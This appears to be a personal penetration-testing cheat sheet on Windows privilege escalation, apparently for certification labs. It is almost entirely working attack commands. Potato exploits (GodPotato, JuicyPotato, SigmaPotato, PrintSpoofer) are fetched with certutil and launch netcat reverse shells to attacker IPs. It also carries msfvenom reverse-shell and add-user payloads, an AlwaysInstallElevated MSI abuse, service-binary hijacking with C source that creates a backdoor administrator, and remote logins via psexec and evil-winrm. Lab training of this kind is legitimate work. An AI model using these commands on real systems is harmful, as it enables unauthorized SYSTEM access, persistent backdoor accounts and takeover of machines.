Windows Privesc

Privilege Escalation

Find Commands

# Find flag
Get-ChildItem -Path C:\ -Recurse -Include "proof.txt", "local.txt" -Force 2>$null
dir C:\local.txt /s /b 2>nul
dir C:\proof.txt /s /b 2>nul

Potato Attacks

Identify

# Identify privileges & privileges that may be of interest
whoami /priv
SeImpersonatePrivilege, SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, SeDebug

# Check for security patches
systeminfo
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }
Locate the CVE, check if it's patched.

GodPotato

# GodPotato https://github.com/BeichenDream/GodPotato/releases
# Identify the NET framework version
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

certutil -urlcache -split -f http://192.168.45.206/GodPotato-NET4.exe
.\GodPotato-NET4.exe -cmd "whoami"
[*] CurrentUser: NT AUTHORITY\SYSTEM

# Shell
certutil -urlcache -split -f http://192.168.45.206/nc64.exe
.\GodPotato-NET4.exe -cmd ".\nc64.exe 192.168.45.206 420 -e c:\windows\system32\cmd.exe"

JuicyPotato

# http://ohpe.it/juicy-potato/CLSID/
# https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe
# https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www
\nc.exe -e cmd.exe 192.168.45.206 4445" -t * -c {03ca98d6-ff5d-49b8-abc6-03dd84127020}

SigmaPotato

# SigmaPotato
# https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
certutil -urlcache -split -f http://192.168.45.162/SigmaPotato.exe SigmaPotato.exe

.\SigmaPotato "net user qais Password /add" # net user
.\SigmaPotato "net localgroup Administrators qais /add" # net localgroup administrators

/usr/bin/impacket-psexec [email protected]
evil-winrm -i 192.168.45.162 -u qais -p Password

PrintSpoofer

# https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
PrintSpoofer.exe -i -c cmd

C:\WINDOWS\system32>whoami
nt authority\system

AlwaysInstallElevated

# If these 2 registers are enabled (value is 0x1)
# Then users of any privilege can install (execute) *.msi files as NT AUTHORITY\SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

msfvenom -p windows/adduser USER=qais PASS=Password123 -f msi -o pfs.msi

# Run the payload
msiexec /quiet /qn /i C:\Users\John\Documents\pfs.msi

# Run CMD as administrator, login with qais

RunAs

# With GUI access & creds
PS C:\Users\steve> runas /user:backup cmd

runas /savecred /user:WORKGROUP\Administrator "\\192.168.45.162\share\rev.exe"
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe"

Unquoted Service Paths

# Identify
wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """
Get-ModifiableServiceFile # PowerUp

# List services
sc query
net start / net stop
Get-Service

# Info of a service
sc.exe qc

# Check permissions
icacls "C:\Path" (RX,W)
Get-ACL

# Payload
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.208 LPORT=4444 -f exe > ServiceName.exe
msfvenom -p windows/exec CMD='net user qais password123! /add && net localgroup administrators qais /add' -f exe-service -o ServiceName.exe
#include <stdlib.h>
int main ()
{
  int i;
 
  i = system ("net user qais password123! /add");
  i = system ("net localgroup administrators qais /add");
 
  return 0;
}
# x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

# Copy exe to correct dir
# Restart
shutdown /r /t 0 # To issue reboot, must have the SeShutDownPrivilege
net stop
Restart-Service Service
Start-Service Service

Service Binary Path

# Identify services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

# Check permissions
# Transfer payload

# Move the binary to restore it later
move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe

# Restart

# Check if it's "automatic" for reboot if net stop doesn't work
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}

# Confirm
Get-LocalGroupMember administrators

WSL

file c
c: directory
mount -t drvfs C: /mnt/c
cd c

Windows - Privilege Escalation - Internal All The Thingsswisskyrepo.github.io

Page not found - HackTricksbook.hacktricks.xyz

Basic Win CMD for Pentesters - HackTricksbook.hacktricks.xyz

LOLBASlolbas-project.github.io

LOFLCABlofl-project.github.io

PreviousWindown Enumeration NextMaintaining Access

Last updated 4 months ago